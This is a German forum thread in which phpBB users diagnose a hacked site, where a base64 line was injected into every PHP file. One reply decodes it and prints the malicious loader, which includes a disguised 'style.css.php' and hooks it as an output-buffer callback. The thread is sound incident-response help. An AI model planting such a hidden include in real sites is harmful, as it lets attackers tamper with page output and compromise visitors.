Seite 1 von 1
Ominöse Zeilen in JEDER php-Datei
Verfasst: 18.12.2009 14:01
von TeddyKlaus
Hallo,
ich habe mal 'ne Frage:
Auf meinem Server haben alle PHP-Dateien die folgende Zeile im Code:
Habt Ihr 'ne Ahnung, was das ist? Auf meinem Testserver sehen die Dateien nicht so aus.
Der Code ist immer "vor"der ersten Zeile eingefügt.
Viele Grüße
Klaus
Re: Ominöse Zeilen in JEDER php-Datei
Verfasst: 18.12.2009 14:12
von Tim
Hallo Klaus,
das sieht aus wie eine Base64 Verschlüsselung, die das folgende Script, bzw. den Code in den PHP-Dateien für die Ausgabe verschlüsseln soll.
Genau kenne ich mich damit nicht aus, habe nur mal kurz gegoogelt. LG Tim
Re: Ominöse Zeilen in JEDER php-Datei
Verfasst: 18.12.2009 14:18
von bantu
Die Zeile gehört nicht zu phpBB und deutet darauf hin, dass jemand Zugang zu deinem Benutzeraccount hatte.
Re: Ominöse Zeilen in JEDER php-Datei
Verfasst: 18.12.2009 14:22
von Tim
bantu hat geschrieben:Die Zeile gehört nicht zu phpBB und deutet darauf hin, dass jemand Zugang zu deinem Benutzeraccount hatte.
Naja, da es ja in jeder PHP-Datei ist glaube ich eher, dass der Webspaceanbieter das so eingerichtet hat, dass jede PHP-Datei diese Verschlüsselung bekommt. Frag da einfach mal nach. Wenn der nein sagt, dann wird es wirklich nichts Positives sein.
Re: Ominöse Zeilen in JEDER php-Datei
Verfasst: 18.12.2009 15:31
von cYbercOsmOnauT
Das ist definitiv nicht von Deinem Hoster. Hier die decodierte Version der Base64 Zeile
Code: Alles auswählen
if (function_exists('ob_start') && !isset($GLOBALS['mfsn']))
{
$GLOBALS['mfsn']='/kunden/homepages/30/d253151289/htdocs/Tastenboard/bulitipp/include/jscalendar/skins/aqua/style.css.php';
if (file_exists($GLOBALS['mfsn'])){
include_once($GLOBALS['mfsn']);
if (function_exists('gml') && function_exists('dgobh')) {
ob_start('dgobh');
}
}
}
Innerhalb Deines Styles ist anscheinend eine style.css.php die m.E. bösartige Funktionen nachläd. Diese Funktion wird als Callback eines Ausgabepuffers gesetzt. Ich denke mal, dass dieser Callback dann die Ausgabe im Sinne der Cracker verändert.
Hierfür gibt es zwei mögliche Angriffspunkte: Entweder hat jemand Euren Server-/Ftp-Zugang gehackt und dort die Dateien verändert, oder aber Du hast Dir einen Trojaner eingefangen der dies ohne das Du es siehst gemacht hat. Du solltest auf jeden Fall Deinen Rechner überprüfen und die Datei entfernen sowie diese Zeile überall auch.
Viele Grüße,
Tekin
Re: Ominöse Zeilen in JEDER php-Datei
Verfasst: 18.12.2009 16:43
von TeddyKlaus
Vielen Dank für Eure Meinungen und Hinweise.
Ich habe jetzt den kompletten Code runtergeladen, den Code in jedem php-file gelöscht und wieder hochgeladen. Ich hatte nämlich auch das Problem, dass ich z.B. bei der Schnellmoderation immer auf eine Seite gelangt bin, die nur aus einem Passwortfeld bestand.
Ich habe eine Vermutung, wobei ich aber niemandem was schlechtes unterstellen will.
Die style.css.php steht im include-Verzeichnis meines Bundesligatippspiels (xcript). Da stehen aber normalerweise nur gif-files und eine theme.css drin.
Jetzt stehen da jede Menge mehr Dateien auf dem Server. Hier nur die zusätzlichen Dateien:
Code: Alles auswählen
17.12.2009 08:53 776 cnf
17.12.2009 08:53 128 csi
17.12.2009 08:53 35.455 dg.php
17.12.2009 08:53 0 lock
17.12.2009 08:53 62.159 s.php
17.12.2009 08:53 89.338 skwd
17.12.2009 08:53 180.760 style.css.php
17.12.2009 08:53 402 swf
Die Datei skwd besteht aus 9.638 Keywords mit zweifelhaftem Inhalt.
Auf dem Server sind alle PHP-Dateien am 14.12.2009 um 20.11 Uhr geändert worden. In den Logs finde ich keinen passenden Eintrag, weder in den access noch in den ftp-logs.
Ich lasse die Spiel- und Ergebnisdaten über mehrere Cronjobs bei
http://www.cronjob.de aktualisieren.
Ich habe jetzt auch komplett alle Dateien des MODs ausgetauscht.
Gruß
Klaus
Re: Ominöse Zeilen in JEDER php-Datei
Verfasst: 21.12.2009 11:56
von Thyron
Klaus, das ist ja wirklich genau
das gleiche Problem, das ich habe bzw. wie ich hoffe hatte...
Re: Ominöse Zeilen in JEDER php-Datei
Verfasst: 21.12.2009 14:12
von Metzle
Hallo,
ich habe auch hier dann mal im ersten Beitrag den Code entschärft, damit damit kein Schaden verursacht werden kann.